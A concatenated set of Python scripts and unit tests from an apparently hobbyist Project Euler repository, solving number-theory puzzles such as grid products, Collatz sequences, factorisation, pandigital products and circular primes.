import numpy as np from matrix import flipdiag, groups # grid is 20x20 to begin matrix = np.array([8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8, 49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0, 81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65, 52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91, 22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80, 24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50, 32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70, 67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21, 24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72, 21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95, 78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92, 16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57, 86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58, 19, 80, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40, 4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66, 88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69, 4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36, 20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16, 20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54, 1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48], dtype=np.int64) # dim = length of square matrix side; w = width of summable array def problem11(dim, w): m = matrix.reshape(dim, dim) f = np.flip(m, axis=1) h = groups(m, w) v = groups(m.transpose(), w) dh = groups(flipdiag(m, dim), w) dv = groups(flipdiag(f, dim), w) # for dd in dv: # print("|".join([f"( {x:.0f},)" for x in dd])) all = [h, v, dh, dv] products = [a.prod(axis=1, dtype=np.int64) for a in all] max_indices = [np.argmax(a) for a in products] max_values = [products[idx][x] for idx, x in enumerate(max_indices)] max_factors = [all[idx][x] for idx, x in enumerate(max_indices)] print(f"indices: {max_indices}: values: {max_values}: factors: {max_factors}") problem11(20, 4)
cgnik/euler
src/py/util/test_collatz.py
<gh_stars>0 from unittest import TestCase from util.collatz import collatz, collatz_series class Test_collatz(TestCase): def test_collatz(self): self.assertEqual(collatz(13), 40) self.assertEqual(collatz(40), 20) def test_collatz_series(self): self.assertListEqual(list(collatz_series(13)), [40, 20, 10, 5, 16, 8, 4, 2, 1])
cgnik/euler
src/py/util/test_factors.py
from unittest import TestCase import numpy as np from util.factoring import factors from util.cartesian import all_factors class Test_factors(TestCase): def test_factors(self): self.assertListEqual(listify(factors(1)), [1]) self.assertListEqual(listify(factors(12)), [1, 2, 3, 12]) self.assertListEqual(listify(factors(8)), [1, 2, 8]) self.assertListEqual(listify(factors(9)), [1, 3, 9]) self.assertListEqual(listify(factors(5)), [1, 5]) self.assertListEqual(listify(factors(22)), [1, 2, 11, 22]) self.assertListEqual(listify(factors(25)), [1, 5, 25]) self.assertListEqual(listify(factors(63)), [1, 3, 7, 63]) self.assertListEqual(listify(factors(1210)), [1, 2, 5, 11, 1210]) def test_all_factors(self): self.assertListEqual(listify(all_factors(220)), [1, 2, 4, 5, 10, 11, 20, 22, 44, 55, 110]) self.assertListEqual(listify(all_factors(284)), [1, 2, 4, 71, 142]) self.assertListEqual(listify(all_factors(1210)), [1, 2, 5, 10, 11, 22, 55, 110, 121, 242, 605]) self.assertListEqual(listify(all_factors(11132)), [1, 2, 4, 11, 22, 23, 44, 46, 92, 121, 242, 253, 484, 506, 1012, 2783, 5566]) def listify(gen): x = list(np.unique(np.array([f for f in gen]))) x.sort() return x
cgnik/euler
src/py/util/test_fibonacci.py
from unittest import TestCase from util.fibonacci import fibonacci class Test_fibonacci(TestCase): def test_fibonacci(self): def nth_fibonacci(n): count = 0 for f in fibonacci(): count += 1 if count >= n: break; return f self.assertEqual(21, nth_fibonacci(8)) self.assertEqual(144, nth_fibonacci(12))
cgnik/euler
src/py/problem33.py
<reponame>cgnik/euler # https://projecteuler.net/problem=33 # # The fraction 49/98 is a curious fraction, as an inexperienced mathematician in attempting to simplify it may incorrectly believe that 49/98 = 4/8, which is correct, is obtained by cancelling the 9s. # # We shall consider fractions like, 30/50 = 3/5, to be trivial examples. # # There are exactly four non-trivial examples of this type of fraction, less than one in value, and containing two digits in the numerator and denominator. # # If the product of these four fractions is given in its lowest common terms, find the value of the denominator. from functools import reduce from operator import mul all_nums = [f"{x}" for x in range(11, 100) if x % 10 != 0] def problem33(): combos = [(a, b) for a in all_nums for b in all_nums] answers = [] for i in range(1, 10): si = f"{i}" for x, y in list(filter(lambda z: si in f"{z[0]}" and si in f"{z[1]}", combos)): if x == y or x.strip(si) == '' or y.strip(si) == '': continue p, d = float(f"{x}".strip(si)), float(f"{y}".strip(si)) if (p / d) > 1: continue if (float(x) / float(y)) == (p / d): answers.append((x, y)) n, d = [int(n[0]) for n in answers], [int(n[1]) for n in answers] pn, pd = reduce(mul, n), reduce(mul, d) print(f"numerator: {pn} denominator: {pd} Done.") problem33()
cgnik/euler
src/py/util/test_abundant.py
from unittest import TestCase from util.abundant import abundant_numbers, contains_sum_for class Test_abundants(TestCase): test_data1 = [] test_data2 = [[1, 2], [3, 4]] test_data3 = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] # def test_abundants_wierdos(self): # # [1, 2, 4, 11, 22, 44, 121, 242, 253, 484, 506, 1012, 2783, 5566] # # [1, 2, 4, 11, 22, 23, 44, 46, 92, 121, 242, 253, 484, 506, 1012, 2783, 5566] # abundants = abundant_numbers(11493) # self.assertTrue(11132 in abundants) # self.assertTrue(11492 in abundants) # def test_abundants(self): self.assertListEqual(abundant_numbers(270), [12, 18, 20, 24, 30, 36, 40, 42, 48, 54, 56, 60, 66, 70, 72, 78, 80, 84, 88, 90, 96, 100, 102, 104, 108, 112, 114, 120, 126, 132, 138, 140, 144, 150, 156, 160, 162, 168, 174, 176, 180, 186, 192, 196, 198, 200, 204, 208, 210, 216, 220, 222, 224, 228, 234, 240, 246, 252, 258, 260, 264, 270]) def test_contains_sum_for(self): self.assertTrue(contains_sum_for(3, [1, 2])) self.assertFalse(contains_sum_for(3, [2, 2])) self.assertTrue(contains_sum_for(15, [1, 2, 3, 4, 5, 10, 20, 30, 40])) self.assertTrue(contains_sum_for(15, [1, 2, 3, 4, 5, 13, 20, 30, 40])) self.assertFalse(contains_sum_for(15, [1, 2, 3, 4, 5, 20, 30, 40])) self.assertTrue(contains_sum_for(24, [12, 17, 20])) self.assertTrue(contains_sum_for(7141, [1, 444, 7723, 7140, 8002])) self.assertTrue(contains_sum_for(34, [12, 17, 20])) self.assertFalse(contains_sum_for(19, [12, 13, 14, 15, 17, 20])) self.assertFalse(contains_sum_for(11132, [])) self.assertFalse(contains_sum_for(11492, []))
cgnik/euler
src/py/util/spiral.py
import numpy as np def spiral_diagonals(length): return list(diagonal_values(2 * length - 1)) def diagonal_values(cycles): offset = 2 cycle = 0 previous = 1 yield previous while cycle + 1 < cycles: cycle += 1 previous += offset if cycle % 4 == 0: offset += 2 yield previous return
cgnik/euler
src/py/util/grids.py
import numpy as np def get_sticks(grid): if len(grid.shape) != 2: return [] rows, columns = grid.shape sticks = [] for x in range(0, columns): for y in range(0, rows): if x < columns - 1: sticks.append((grid[y][x], grid[y][x + 1])) if y < rows - 1: sticks.append((grid[y][x], grid[y + 1][x])) return sticks def routes_matching(start, routes, idx): return filter(lambda x: x[idx] == start, routes) def join_path(t1, t2): return tuple(j for i in (t1, t2[1]) for j in (i if isinstance(i, tuple) else (i,))) def gen_paths(data): grid = np.array(data) sticks = get_sticks(grid) if len(sticks) < 4: # min possible for 2x2 return [] origin = grid[0][0] paths = list(routes_matching(origin, sticks, 0)) while paths[0][-1] != data[-1][-1]: print('.',end='',flush=True) new_paths = [] for path in paths: new_paths.extend([join_path(path, a) for a in routes_matching(path[-1], sticks, 0)]) paths = new_paths return paths
cgnik/euler
src/py/util/test_permutations.py
<gh_stars>0 from unittest import TestCase from util.permutation import permutations, permute_all, permute, combinations, permute_all_combinations def stringify(arr): response = [''.join([str(a) for a in b]) for b in arr] response.sort() return response class Test_Permutations(TestCase): def test_permutations(self): self.assertListEqual(stringify(permutations([1, 2, 3])), "123,132,213,231,312,321".split(',')) self.assertListEqual(stringify(permutations([0, 1, 2])), "012,021,102,120,201,210".split(',')) def test_permute(self): self.assertListEqual(list(permute_all(list("12"))), [["1", "2"], ["2", "1"]]) self.assertListEqual(list(permute_all(list("123"))), [ ['1', '2', '3'], ['3', '2', '1'], ['3', '2', '1'], ['1', '2', '3'], ['2', '1', '3'], ['3', '1', '2']]) def test_combinations(self): self.assertListEqual(list(combinations(['1', '2'], 1)), [['1'], ['2']]) self.assertListEqual(list(combinations(['1', '2', '3'], 1)), [['1'], ['2'], ['3']]) self.assertListEqual(list(combinations(['1', '2', '3'], 2)), [['2', '1'], ['3', '1'], ['3', '2']]) def test_permute_all_combinations(self): self.assertSetEqual(permute_all_combinations(('1', '2', '3'), 2), { ('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')})
cgnik/euler
src/py/util/threadsafe_generator.py
<reponame>cgnik/euler<filename>src/py/util/threadsafe_generator.py import threading class ThreadsafeIterator: def __init__(self, it): self.it = it self.lock = threading.Lock() def __iter__(self): return self def __next__(self): with self.lock: return self.it.__next__()
cgnik/euler
src/py/problem10.py
<gh_stars>0 from primerator import Primerator import numpy limit = 2000000 p = Primerator(limit).primes() with open('primes.txt', 'w') as f: f.write('\n'.join(map(lambda x: str(x), p))) print(f"\nSum of primes < {limit}: {numpy.sum(p)}")
cgnik/euler
src/py/problem32.py
<reponame>cgnik/euler # https://projecteuler.net/problem=32 # We shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once; for example, the 5-digit number, 15234, is 1 through 5 pandigital. # # The product 7254 is unusual, as the identity, 39 ร— 186 = 7254, containing multiplicand, multiplier, and product is 1 through 9 pandigital. # # Find the sum of all products whose multiplicand/multiplier/product identity can be written as a 1 through 9 pandigital. # # HINT: Some products can be obtained in more than one way so be sure to only include it once in your sum. import util.permutation as p numbers = "123456789" def is_pandigital(x, c, p): s = list('{}{}{}'.format(x, c, p)) s.sort() return ''.join(s) == numbers def make_ints(charrays): for a in charrays: yield int(''.join(a)) def problem32(): # strategy: brute force: permutations of "123456789" # broken into 3 strings # strings for the multiplicands must be 1-4 characters, each, no more, # considering that the use of 5 characters on the left of = would # necessitate the presence of no more than 4 on the right, which could # only be true if it was something like 2*4-digit=other-4-digit # this is like a 5 people in 3 chairs problem: factorial(9) / (factorial(9 - 4)) # so there are only 3024 permutations of "123456789" in 4 slots, 504 in 3 slots, # 72 in 2 slots, and 9 in 1 slot, making this brute-forceable assert is_pandigital(39, 186, 39*186) num_list = list(numbers) arg_lists = [list(make_ints(p.permute_all_combinations(num_list, n))) for n in range(1, 5)] # all pairings of arg lists, find products candidates = set() for arg_list in p.combinations(arg_lists, 2): for arga in arg_list[0]: for argb in arg_list[1]: candidates.add((arga, argb, arga * argb)) pandigitals = list(filter(lambda x: is_pandigital(x[0], x[1], x[2]), candidates)) print(f"{pandigitals} Done.") print(f"{sum(set([p[2] for p in pandigitals]))} Done.") problem32()
cgnik/euler
src/py/util/test_distinct_powers.py
from unittest import TestCase from util.distinct_powers import distinct_powers, simplify_exponent class Test_distinct_powers(TestCase): def test_distinct_powers(self): # self.assertSetEqual(distinct_powers(2, 5), {4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125}) self.assertEqual(distinct_powers(2, 5), 15) def test_simplify_exponent(self): self.assertEqual(simplify_exponent(4, 2), (2, 4)) self.assertEqual(simplify_exponent(9, 2), (3, 4)) self.assertEqual(simplify_exponent(16, 2), (2, 8)) self.assertEqual(simplify_exponent(2, 2), (2, 2)) self.assertEqual(simplify_exponent(7, 7), (7, 7)) self.assertEqual(simplify_exponent(64, 2), (2, 12)) self.assertEqual(simplify_exponent(4, 3), (2, 6))
cgnik/euler
src/py/util/test_digit_exponents.py
<reponame>cgnik/euler from unittest import TestCase from util.digit_exponents import is_power_sum, power_sums class TestDigitExponents(TestCase): def test_is_power_sum(self): self.assertTrue(is_power_sum(1634, 4)) self.assertTrue(is_power_sum(8208, 4)) self.assertTrue(is_power_sum(9474, 4)) self.assertFalse(is_power_sum(5, 4)) self.assertFalse(is_power_sum(8238, 4)) self.assertFalse(is_power_sum(9187324182347, 4)) def test_power_sums(self): self.assertListEqual(list(power_sums(4, 2000)), [1634]) self.assertListEqual(list(power_sums(4, 9000)), [1634, 8208]) self.assertListEqual(list(power_sums(4, 9500)), [1634, 8208, 9474])
cgnik/euler
src/py/util/divisible.py
def is_divisible(a, b): return a % b == 0 def any_divisors(a, bs): if not bs: return False for b in iter(bs): yield is_divisible(a, b) return False def divisible_by(a, bs): return any(any_divisors(a, bs))
cgnik/euler
src/py/problem27.py
<reponame>cgnik/euler<gh_stars>0 # Euler discovered the remarkable quadratic formula: # # n2+n+41 # It turns out that the formula will produce 40 primes for the consecutive integer values 0โ‰คnโ‰ค39. However, when n=40,402+40+41=40(40+1)+41 is divisible by 41, and certainly when n=41,412+41+41 is clearly divisible by 41. # # The incredible formula n2โˆ’79n+1601 was discovered, which produces 80 primes for the consecutive values 0โ‰คnโ‰ค79. The product of the coefficients, โˆ’79 and 1601, is โˆ’126479. # # Considering quadratics of the form: # # n2+an+b, where |a|<1000 and |b|โ‰ค1000 # # where |n| is the modulus/absolute value of n # e.g. |11|=11 and |โˆ’4|=4 # Find the product of the coefficients, a and b, for the quadratic expression that produces the maximum number of primes for consecutive values of n, starting with n=0. from multiprocessing import Process, Pipe, Pool import numpy as np import itertools as it from util.quadratic_primes import sign_combos def problem27(): coefficients = np.arange(0, 1001) with Pool(6) as pool: results = pool.map_async(sign_combos, it.product(coefficients, coefficients)) out = [r for r in results.get() if r[0] > 1] out.sort(reverse=True) print(f"Result count: {len(out)}, max: {max(out)}, out: {out}") print(f"Answer: {out[0][1][0] * out[0][1][1]} with prime count {out[0][0]} and coefficients {out[1]}") print(f"Problem 27: complete") problem27()
cgnik/euler
src/py/problem24.py
<reponame>cgnik/euler # Lexicographic permutations # # Problem 24 # # A permutation is an ordered arrangement of objects. For example, 3124 is one possible permutation of the digits 1, 2, 3 and 4. If all of the permutations are listed numerically or alphabetically, we call it lexicographic order. The lexicographic permutations of 0, 1 and 2 are: # # 012 021 102 120 201 210 # # What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9? from util.permutation import permutations def problem24(): p = [''.join(p) for p in permutations([str(n) for n in range(0, 10)]) if p[0] in "012"] p.sort() print(f"Problem 24: Millionth permutation sorted lexically (total count {len(p)}): {p[999999]}") problem24()
cgnik/euler
src/py/util/quadratic_primes.py
from util.factoring import is_prime_quick import numpy as np def expr(n, ab): return n ** 2 + (ab[0] * n) + ab[1] def consecutive_primes(ab): n = 0 while True: n += 1 if not is_prime_quick(expr(n, ab)): return n return 0 signs = np.array([(-1, 1), (1, -1), (-1, -1), (1, 1)]) def sign_combos(coeff): return max([(consecutive_primes(ab), tuple(ab)) for ab in (signs * coeff)])
cgnik/euler
src/py/problem35.py
<reponame>cgnik/euler # The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime. # # There are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97. # # How many circular primes are there below one million? # https://projecteuler.net/problem=35 from util.primerator import is_prime_quick as is_prime def digits(num): if num == 0: yield 0 n = num while n > 0: yield n % 10 n = int(n / 10) def is_circular_prime(x): s = list(str(x)) for r in range(0, len(str(x))): g = s[r:] + s[0:r] if not is_prime(int(''.join([str(pp) for pp in g]))): return False return True def circular_primes(limit): if limit > 2: yield 2 for x in range(1, limit, 2): print(f"\rTesting {x:07d}", end='', flush=True) if is_circular_prime(x): print(f"\r \u2713 {x:07d}", flush=True) yield x print('\nDone.') def init_test(): expected = {2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, 97, 113, 131, 197, 199} actual = set(list(circular_primes(200))) assert expected.intersection( actual) == expected, f"Test failed to generate expected results: \nexpect: {expected}\nactual: {actual}" def problem35(): init_test() cyclics = list(circular_primes(10 ** 6)) print(f"answer: {len(cyclics)}, cyclics: {cyclics}") problem35()
cgnik/euler
src/py/problem19.py
month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] month_days_leap = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] days = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'] months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'] def problem19(): matches = [] offset = 1 for year in range(0, 101): if year > 0 and year % 4 == 0: md = month_days_leap else: md = month_days for m in range(0, 12): if m == 6 and year == 0: print(f"{months[m]} :: {md[:m]} :: {sum(md[:m])} :: {sum(md[:m]) + offset} :: {(sum(md[:m]) + offset) % 7}") if (sum(md[:m]) + offset) % 7 == 0 and year > 0: matches.append((1900 + year, months[m])) offset = (sum(md) + offset) % 7 for match in matches: print(f"match: {match}") print(f"Problem 19 answer: {len(matches)}") # if year starts on a monday, then begin_offset = 6 # for each month, sum of first_of_year_offset + sum(month_dayx[0:month_index]) = offset for next first-of-month # mon, jan 1, 1900 (not leap, first_of_year_offset = 6) # sun, jan 7, 14, 21, 28, 1900 (first sundays) # thu, feb 1, 1900 (first of second month) # thu, mar 1, 1900 (first of third month) # sun, apr 1, 1900 (first of fourth month) # (31 - 6) % 7 = 4 # (count_month_days - year_offset) % days_in_week problem19()
cgnik/euler
src/py/util/test_cartesian.py
<filename>src/py/util/test_cartesian.py from unittest import TestCase import numpy as np from util.cartesian import cartesian class Test_cartesian(TestCase): def test_cartesian(self): def lte(limit): def test(x): return x <= limit return test self.assertListEqual(listify(cartesian(lte(2), [1])), [1]) self.assertListEqual(listify(cartesian(lte(16), [1, 2])), [1, 2, 4, 8, 16]) self.assertListEqual(listify(cartesian(lte(81), [1, 3])), [1, 3, 9, 27, 81]) self.assertListEqual(listify(cartesian(lte(81), [1, 2, 3])), [1, 2, 3, 4, 6, 8, 9, 12, 16, 18, 24, 27, 32, 36, 48, 54, 64, 72, 81]) self.assertListEqual(listify(cartesian(lte(1), [1, 2, 3])), [1]) self.assertListEqual(listify(cartesian(lte(2), [1, 2, 3])), [1, 2]) self.assertListEqual(listify(cartesian(lte(24), [1, 2, 3])), [1, 2, 3, 4, 6, 8, 9, 12, 16, 18, 24]) def listify(gen): x = list(np.unique(np.array([f for f in gen]))) x.sort() return x
cgnik/euler
src/py/util/test_nth.py
<gh_stars>0 from unittest import TestCase from util.nth import nth class Test_nth(TestCase): def test_nth(self): self.assertEqual(1, nth(3, [0, 2, 1])) self.assertEqual(0, nth(-33, [0, 2, 1])) def test_gen(max): for i in range(0, max): yield i self.assertEqual(2, nth(3, test_gen(4))) self.assertEqual(2, nth(3, test_gen(8)))
cgnik/euler
src/py/problem29.py
<gh_stars>0 # Consider all integer combinations of ab for 2 โ‰ค a โ‰ค 5 and 2 โ‰ค b โ‰ค 5: # # 22=4, 23=8, 24=16, 25=32 # 32=9, 33=27, 34=81, 35=243 # 42=16, 43=64, 44=256, 45=1024 # 52=25, 53=125, 54=625, 55=3125 # If they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms: # # 4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125 # # How many distinct terms are in the sequence generated by ab for 2 โ‰ค a โ‰ค 100 and 2 โ‰ค b โ‰ค 100? from util.distinct_powers import distinct_powers def problem29(): print(f"Problem 29: {distinct_powers(2, 100)}") problem29()
cgnik/euler
src/py/util/test_spiral.py
from unittest import TestCase from util.spiral import spiral_diagonals class Test_spiral(TestCase): def test_spiral_diagonals(self): self.assertListEqual(spiral_diagonals(3), [1, 3, 5, 7, 9]) self.assertListEqual(spiral_diagonals(5), [1, 3, 5, 7, 9, 13, 17, 21, 25]) self.assertListEqual(spiral_diagonals(11), [1, 3, 5, 7, 9, 13, 17, 21, 25, 31, 37, 43, 49, 57, 65, 73, 81, 91, 101, 111, 121])
cgnik/euler
src/py/problem20.py
<filename>src/py/problem20.py from functools import reduce def problem20(): fac = reduce(lambda x, accum: x * accum, range(1, 101)) print(f"fac: {sum(map(int, list(str(fac))))}") problem20()
cgnik/euler
src/py/util/test_quadratic_primes.py
from unittest import TestCase from util.quadratic_primes import consecutive_primes, expr, sign_combos class Test_quadratic_primes(TestCase): def test_consecurive_primes(self): self.assertEqual(40, consecutive_primes((1, 41))) self.assertEqual(80, consecutive_primes((-79, 1601))) def test_expr(self): self.assertEqual(1681, expr(40, (1, 41))) def test_sign_combos(self): self.assertEqual(41, sign_combos((1, 41))[0])
cgnik/euler
src/py/problem28.py
<reponame>cgnik/euler # Starting with the number 1 and moving to the right in a clockwise direction a 5 by 5 spiral is formed as follows: # # 21 22 23 24 25 # 20 7 8 9 10 # 19 6 1 2 11 # 18 5 4 3 12 # 17 16 15 14 13 # # It can be verified that the sum of the numbers on the diagonals is 101. # # What is the sum of the numbers on the diagonals in a 1001 by 1001 spiral formed in the same way? from util.spiral import spiral_diagonals def problem28(): values = spiral_diagonals(1001) # think it should be 2001 count of integers, given width of 1001 # should have a list of 2n-1 integers (by count), considering the 5x5 example print(f"values: {', '.join([str(v) for v in values])}") print(f"Problem 28: sum: {sum(values)}, count: #{len(values)}") problem28()
cgnik/euler
src/py/problem3.py
from util.factoring import factors if __name__ == '__main__': num = 600851475143 fs = [f for f in factors(num)] fs.append([x for f in x for x in factors(f)]) print(f"{fs}")
cgnik/euler
src/py/util/digit_exponents.py
def is_power_sum(n, exponent): return sum(map(lambda x: int(x) ** exponent, str(n))) == n def power_sums(exponent, limit=10000): n = 1 one_percent = int(limit / 100) percent_complete = 0 while n <= limit: if int((n / limit) * 100) > percent_complete: percent_complete = int((n / limit) * 100) print(f"\r{percent_complete}% complete...", flush=True, end='') n += 1 if is_power_sum(n, exponent): yield n print("\r100% complete.")
cgnik/euler
src/py/problem25.py
# The Fibonacci sequence is defined by the recurrence relation: # # Fn = Fnโˆ’1 + Fnโˆ’2, where F1 = 1 and F2 = 1. # Hence the first 12 terms will be: # # F1 = 1 # F2 = 1 # F3 = 2 # F4 = 3 # F5 = 5 # F6 = 8 # F7 = 13 # F8 = 21 # F9 = 34 # F10 = 55 # F11 = 89 # F12 = 144 # The 12th term, F12, is the first term to contain three digits. # # What is the index of the first term in the Fibonacci sequence to contain 1000 digits? from util.fibonacci import fibonacci def get_first_fibonacci(): min_size = 10 ** 999 - 1 count = 1 print(f"length of min: {len(str(min_size))}") for f in fibonacci(): if f >= min_size: return count count += 1 def problem24(): print(f"Problem 25: index of first fibonacci > 10^1000: {get_first_fibonacci()}") problem24()
cgnik/euler
src/py/util/matrix.py
import numpy as np def flipdiag(x, dim): a = np.zeros((dim, dim)) for i in range(-1 * dim, dim): hd = x.diagonal(offset=i) a[i][0:len(hd)] = hd return a def groups(x, size, start=0): return np.vstack([x[:, n:n + size] for n in range(start, x.shape[0] - size + 1) if len(x[n]) >= size])
cgnik/euler
src/py/problem16.py
from functools import reduce def problem16(): print(f"Problem 16 {reduce(lambda x,y: x+y, [int(a) for a in str(2**1000)])}") problem16()
cgnik/euler
src/py/util/test_any_divisors.py
from unittest import TestCase from util.divisible import divisible_by class Test_divisible_by(TestCase): def test_any_divisors(self): self.assertFalse(divisible_by(12, None)) self.assertFalse(divisible_by(12, [])) self.assertTrue(divisible_by(12, [5, 6, 2])) self.assertTrue(divisible_by(8, [2])) self.assertTrue(divisible_by(9, [3])) self.assertFalse(divisible_by(5, [2, 3])) self.assertFalse(divisible_by(22, [10, 45, 7])) self.assertTrue(divisible_by(22, [10, 45, 11])) self.assertTrue(divisible_by(63, [88, 2, 3])) self.assertFalse(divisible_by(63, [88, 2, 5]))
cgnik/euler
src/py/problem21.py
from util.factoring import all_factors # https://projecteuler.net/problem=21 # Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n). # If d(a) = b and d(b) = a, where a โ‰  b, then a and b are an amicable pair and each of a and b are called amicable numbers. # # For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220. # # Evaluate the sum of all the amicable numbers under 10000. def problem21(): all = {} for i in range(1, 10000): if i % 100 == 0: print('.', end='', flush=True) all[i] = sum(all_factors(i)) answer = [] print(f"\n{all}\nsumming...") for k, v in all.items(): if v in all and k in all and v != k and v == all[k] and k == all[v]: answer.append(((k, all[k]), (v, all[v]))) amicables = [a[0][0] for a in answer] print(f"Answer ({len(answer)}): {sum(amicables)}, {amicables}") problem21()
cgnik/euler
src/py/util/palindrome.py
def is_palindrome(x): s = str(x) end = len(s) - 1 for i in range(0, len(s)): if s[i] != s[end - i]: return False return True def find_palindromes(): all = [] for i in range(100, 999): for j in range(100, 999): if is_palindrome(i * j): all.append((i * j, i, j)) return all
cgnik/euler
src/py/problem14.py
from util.collatz import collatz_series def longest_collatz_between(start, end): answer = (0, [], 0) for i in range(start, end): if i % 1000 == 0: print('.', end='', flush=True) x = list(collatz_series(i)) if len(x) > answer[2]: answer = (i, x, len(x)) return answer def problem14(): answer = longest_collatz_between(13, 10 ** 6) print(f"Answer: {answer}") problem14()
cgnik/euler
src/py/util/fibonacci.py
def fibonacci(): nums = [1, 1, 2] yield from nums i = 3 while True: index = i % 3 nums[index] = nums[index - 2] + nums[index - 1] yield nums[index] i += 1
cgnik/euler
src/py/util/test_grids.py
from unittest import TestCase import numpy as np from util.grids import gen_paths, get_sticks class Test_grids(TestCase): test_data1 = [] test_data2 = [[1, 2], [3, 4]] test_data3 = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] def test_get_sticks(self): self.assertCountEqual(get_sticks(np.array(self.test_data1)), []) self.assertCountEqual(get_sticks(np.array(self.test_data2)), [(1, 2), (1, 3), (2, 4), (3, 4)]) self.assertCountEqual(get_sticks(np.array(self.test_data3)), [(1, 2), (1, 4), (2, 5), (2, 3), (3, 6), (4, 5), (4, 7), (5, 6), (5, 8), (6, 9), (7, 8), (8, 9)]) def test_20_sticks(self): # it's always 2(n^2) - 2n def sickerize(n): arr = np.arange(n ** 2).reshape((n, n)) x = get_sticks(arr) for n in [2, 3, 6, 7, 8, 9, 20]: sickerize(n) def test_gen_paths_sanity(self): self.assertListEqual(gen_paths(None), []) self.assertListEqual(gen_paths(self.test_data1), []) def test_gen_paths_basic(self): self.assertListEqual(gen_paths(self.test_data2), [(1, 2, 4), (1, 3, 4)]) def test_gen_paths_complex(self): self.assertListEqual(gen_paths(self.test_data3), [ (1, 2, 3, 6, 9), (1, 2, 5, 6, 9), (1, 2, 5, 8, 9), (1, 4, 5, 6, 9), (1, 4, 5, 8, 9), (1, 4, 7, 8, 9), ])
cgnik/euler
src/py/util/cartesian.py
import itertools as it from operator import mul import numpy as np from functools import reduce from util.factoring import factors def cartesian(boundary, x, *args, reducer=mul): products = x last_products = [] def gen(): yield x if args and len(args): for z in args: yield z else: while True: yield products return None for products in gen(): products = np.unique([reduce(reducer, x) for x in it.product(x, products)]) products = list(filter(boundary, products)) products.sort() if products == last_products: break last_products = products return np.array(products) def cartesian_factors(n, facs): cart = cartesian(lambda x: n % x == 0, facs) return facs, cart[np.where(n % cart == 0)] def cartesian_product(nums, limit=None): product_pairs = it.product(np.array(nums), np.array(nums)) products = [a[0] * a[1] for a in product_pairs] if limit is not None: divisors = list(filter(lambda x: limit % x == 0, products)) else: divisors = products return divisors def cartesian_loop(n, count): facs = list(factors(n)) for c in range(0, count): facs = list(set(cartesian_product(facs, n))) return facs def all_factors(num, include_self=False): answer = cartesian_loop(num, 8) if not include_self: answer.remove(num) return answer
cgnik/euler
src/py/util/distinct_powers.py
<gh_stars>0 import itertools as it import numpy as np # NEED TO DEDUPE/SIMPLIFY_POWERS ON THE POWS LIST BEFORE USING IT. CHICKENEGG. pows = {a ** b: (a, b) for b in range(2, 10) for a in range(2, 11) if a ** b <= 100} def distinct_powers(l, h): values = np.arange(l, h + 1) terms = {simplify_exponent(*p) for p in it.product(values, values)} return len(terms) def simplify_exponent(base, pow): multiplier = pows.get(base, (1, 1)) return int(base ** (1 / multiplier[1])), pow * multiplier[1]
cgnik/euler
src/py/problem34.py
